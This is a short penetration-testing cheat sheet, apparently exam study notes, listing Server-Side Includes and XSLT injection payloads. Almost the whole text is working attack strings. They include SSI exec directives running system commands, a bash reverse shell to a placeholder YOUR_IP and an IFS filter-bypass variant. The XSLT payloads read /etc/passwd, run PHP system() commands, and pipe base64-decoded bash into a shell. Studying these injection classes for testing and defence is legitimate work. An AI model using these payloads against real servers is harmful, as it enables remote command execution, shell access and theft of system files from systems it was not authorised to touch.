SSI & XSLT Injection
Two less-common server-side injections from the CWES path: Server-Side Includes (.shtml) for command execution, and XSLT injection for fingerprinting, file read and PHP RCE. Every payload separated.
SSI Injection
Trigger: .shtml / .shtm extension, or Server: Apache with user input reflected on the page.
Confirm (print all environment variables):
<!--#printenv -->Execute a system command:
<!--#exec cmd="id" -->List files:
<!--#exec cmd="ls -la" -->Include another file:
<!--#include virtual="index.html" -->Reverse shell:
<!--#exec cmd="bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" -->Space-filter bypass with IFS:
<!--#exec cmd="bash${IFS}-i${IFS}>&${IFS}/dev/tcp/YOUR_IP/4444${IFS}0>&1" -->XSLT Injection
Trigger: .xsl / .xslt URL, a “customize report” feature, or a name reflected in XML output. Inject < first - a 500 error confirms XML context.
Fingerprint the processor:
<xsl:value-of select="system-property('xsl:vendor')" />Read a file (XSLT 2.0+):
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />Read a file via PHP function:
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />RCE (PHP):
<xsl:value-of select="php:function('system','id')" />Reverse shell (base64-encode the bash command, then):
<xsl:value-of select="php:function('system','echo BASE64HERE | base64 -d | bash')" />